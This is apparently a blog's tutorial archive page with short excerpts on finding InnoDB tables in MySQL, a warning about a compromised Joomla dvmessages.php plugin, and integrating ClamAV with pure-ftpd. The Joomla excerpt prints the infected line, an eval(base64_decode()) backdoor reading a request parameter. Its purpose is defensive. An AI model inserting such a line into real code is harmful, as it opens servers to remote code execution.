Category Archives: Tutorial

Find which tables use INNODB

The SQL to do this queries the INFORMATION_SCHEMA and is as follows: SELECT table_schema, table_name FROM INFORMATION_SCHEMA.TABLES WHERE engine = ‘innodb’; where: table_schema is the name of the database. table_name is (obviously) the name of the table.

dvmessages.php is being reported as phishing file?

Please be aware that there is a suspicious code in ../plugins/system/dvmessages/dvmessages.php, and may result malicious activity. The original dvmessages.php file is look like this: <?php /** */ // no direct access defined( ‘_JEXEC’ ) or die( ‘Restricted access’ ); jimport( ‘joomla.plugin.plugin’ ); But on the “infected” dvmessages.php <?php defined( ‘_JEXEC’ ) or die(@eval(base64_decode($_REQUEST[‘c_id’]))); jimport( ‘joomla.plugin.plugin’… Read More »

Integrate pure-ftpd with clamav on cpanel server

Clamav can work in conjunction with pure-ftpd to not allow virus’s to be uploaded. Here are the steps. First install Clamav. In the example below clamav is installed in /usr/local/bin but your set up may have it in /usr/bin /etc/pure-ftpd.conf Edit /etc/pure-ftpd.conf and set CallUploadScript yes /etc/init.d/pure-ftpd Edit /etc/init.d/pure-ftpd Look for $DAEMONIZE $fullpath /etc/pure-ftpd.conf -O… Read More »